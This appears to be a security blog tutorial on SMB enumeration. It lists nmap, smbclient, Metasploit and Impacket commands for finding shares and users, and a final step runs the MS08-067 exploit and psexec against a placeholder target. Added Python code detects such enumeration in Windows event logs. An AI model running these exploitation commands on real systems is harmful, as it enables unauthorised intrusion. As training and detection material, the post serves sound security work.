RatSec Blog

SMB Enumeration

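  1. Identify the target IP address or hostname and confirm that the SMB ports (139 and 445) are reachable. This can be done using tools such as Nmap or Netcat.

     ```bash
     # TCP connect scan of the NetBIOS session (139) and SMB (445) ports
     nmap -sT -p 139,445 <target IP address>
     # Verbose connection test against port 139
     nc -v <target IP address> 139
     ```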
  2. Enumerate NetBIOS information. This can be done using tools such as Nmblookup, Nbtscan, or Nmap.

     ```bash
     nmblookup -A <target IP address>
     nbtscan <target IP address>
     nmap -sT -p 139,445 -A <target IP address>
     ```
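  3. Enumerate SMB shares. This can be done using tools such as Smbmap, Smbclient, or Nmap.

     ```bash
     smbmap -H <target IP address>
     smbclient -L <target IP address>
     # -O only performs OS detection; the smb-enum-shares NSE script lists shares
     nmap -sT -p 139,445 --script smb-enum-shares <target IP address>
     ```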
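  4. Enumerate SMB users. This can be done using tools such as Metasploit or Impacket.

     ```bash
     msfconsole
     # Inside the Metasploit console:
     use auxiliary/scanner/smb/smb_enumusers
     set rhosts <target IP address>
     run
     # Impacket has no "enumusers" script; samrdump lists accounts over SAMR
     impacket-samrdump <target IP address>
     ```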
  5. Enumerate SMB vulnerabilities. This can be done using tools such as Nmap or Nessus.

     ```bash
     nmap -sT -p 139,445 -A -v <target IP address>
     # Nessus: create and launch a scan of <target IP address> from the Nessus web interface
     ```
  6. Perform SMB exploitation. This can be done using tools such as Metasploit or Impacket.

     ```bash
     msfconsole
     use exploit/windows/smb/ms08_067_netapi
     set rhosts <target IP address>
     run
     impacket-psexec <target IP address>
     ```
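
Seen from the target's side, the share and user enumeration steps above leave traces in the Windows Security log. The Python below is an added example, not code from the original post: it flags sources that show null-session logons, SRVSVC/SAMR/LSARPC pipe access over IPC$, or a rapid sweep across several shares. The event records are constructed and simplified, the field names and thresholds are assumptions, and events 5140/5145 are only logged when file share auditing is enabled.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records, simplified from Windows Security events
# 4624 (logon), 5140 (share accessed) and 5145 (share object access check).
SAMPLE_EVENTS = [
    {"time": "2024-01-10T09:00:01", "id": 4624, "src": "10.0.0.50", "user": "ANONYMOUS LOGON"},
    {"time": "2024-01-10T09:00:02", "id": 5140, "src": "10.0.0.50", "share": "IPC$"},
    {"time": "2024-01-10T09:00:03", "id": 5145, "src": "10.0.0.50", "share": "IPC$", "target": "srvsvc"},
    {"time": "2024-01-10T09:00:04", "id": 5140, "src": "10.0.0.50", "share": "ADMIN$"},
    {"time": "2024-01-10T09:00:05", "id": 5140, "src": "10.0.0.50", "share": "C$"},
    {"time": "2024-01-10T09:00:09", "id": 5145, "src": "10.0.0.50", "share": "IPC$", "target": "samr"},
    {"time": "2024-01-10T09:30:00", "id": 5140, "src": "10.0.0.7", "share": "Finance"},
    {"time": "2024-01-10T11:45:00", "id": 5140, "src": "10.0.0.7", "share": "IPC$"},
]

# Named pipes reached through IPC$ that back the enumeration calls.
RPC_PIPES = {"samr": "account enumeration (SAMR)",
             "lsarpc": "SID/policy lookup (LSARPC)",
             "srvsvc": "share listing (SRVSVC)"}

def detect_smb_enumeration(events, window=timedelta(minutes=5), share_threshold=3):
    """Return {source_ip: sorted findings} for enumeration-like SMB activity."""
    findings = defaultdict(set)
    share_hits = defaultdict(list)  # src -> [(time, share)]
    for ev in sorted(events, key=lambda e: e["time"]):
        ts, src = datetime.fromisoformat(ev["time"]), ev["src"]
        if ev["id"] == 4624 and ev.get("user", "").upper() == "ANONYMOUS LOGON":
            findings[src].add("null session logon")
        elif ev["id"] == 5145 and ev.get("share", "").upper() == "IPC$":
            pipe = ev.get("target", "").lower()
            if pipe in RPC_PIPES:
                findings[src].add(RPC_PIPES[pipe])
        elif ev["id"] == 5140:
            hits = share_hits[src]
            hits.append((ts, ev["share"].upper()))
            # Keep only accesses inside the sliding window ending at this event.
            hits[:] = [(t, s) for t, s in hits if ts - t <= window]
            if len({s for _, s in hits}) >= share_threshold:
                findings[src].add("share sweep")
    return {src: sorted(f) for src, f in findings.items()}

if __name__ == "__main__":
    for src, found in detect_smb_enumeration(SAMPLE_EVENTS).items():
        print(src, "->", ", ".join(found))
```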